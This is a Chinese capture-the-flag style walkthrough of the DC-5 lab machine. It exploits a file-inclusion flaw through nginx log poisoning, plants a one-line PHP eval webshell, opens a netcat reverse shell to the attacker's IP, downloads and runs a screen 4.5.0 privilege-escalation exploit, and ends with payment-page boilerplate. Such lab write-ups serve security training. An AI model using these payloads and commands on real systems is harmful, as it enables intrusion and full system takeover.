DC-5 靶机

DC_5

信息搜集

存活检测

image-20231023085358455

详细扫描

image-20231023113324267

后台网页扫描

image-20231023123845266

网页信息搜集

  • 发现 Contact 栏中有搜索框

    image-20231023113423335

    尝试上传内容

    image-20231023113508768

  • 多次上传后同一页面发现下方的年份数字在不断变化

    image-20231023123959784

    同时在查看源代码时发现年份所在的代码模块存在与之前扫描出的后台网站 footer.php 的名称相同

    image-20231023124132290

    猜测存在文件包含

  • 抓包验证漏洞

    请求访问 /etc/passwd 文件,成活获得响应,存在文件包含漏洞

    image-20231023130020379

    但获取的 passwd 文件中无密码信息

webshell

  • 尝试上传 php 命令查看能否执行

    <?php echo"helloooooooooo";?>
    

    image-20231023131158038

  • 查看 nginx 的日志文件(详细扫描得知 80 端口开启 nginx 服务)

    /var/log/nginx/error.log
    

    发现 php 语句被成功执行输出

    image-20231023131301936

  • 尝试上传一句话木马

    <?php eval($_POST['gjl']);?>
    

    image-20231023131342533

  • 蚁剑连接测试

    http://10.4.7.149/thankyou.php?file=/var/log/nginx/error.log
    

    image-20231023131722916

  • 建立连接

    进入,开启虚拟终端

    image-20231023131800616

  • kali 开启 nc 监听

    nc -lvvp 7777
    
  • 使用蚁剑的虚拟终端将执行连接反弹 shell 的命令

    nc -e /bin/bash 10.4.7.146 7777
    

    image-20231023132105459

提权

  • 信息搜集

    image-20231023132349188

  • 尝试进行 suid 提权

    screen 是一个在 Linux 系统中常用的终端复用工具,可以在一个终端窗口中同时运行多个会话,并在会话之间切换。它可以帮助用户在远程连接或者长时间运行的任务中保持会话的持久性。

  • 搜索 screen 的漏洞

    searchsploit screen 4.5.0
    

    image-20231023132857588

  • 下载漏洞脚本

    image-20231023133016304

  • vim 41154.sh 查看脚本注释中的使用方法

    image-20231023133754189

    可以看出运行该脚本后会自动编写编译提权脚本

  • kali 开启 http 上传服务

    python3 -m http.server 80
    

    image-20231023133926153

  • 靶机切换到 /tmp 目录下下载提权脚本

    wget 10.4.7.146/41154.sh
    

    image-20231023134043259

  • 赋权,运行,提权成功

    image-20231023134106816

    image-20231023134158508

总结

  • 文件包含
  • 一句话木马
  • searchsploit 漏洞搜索
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

gjl_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值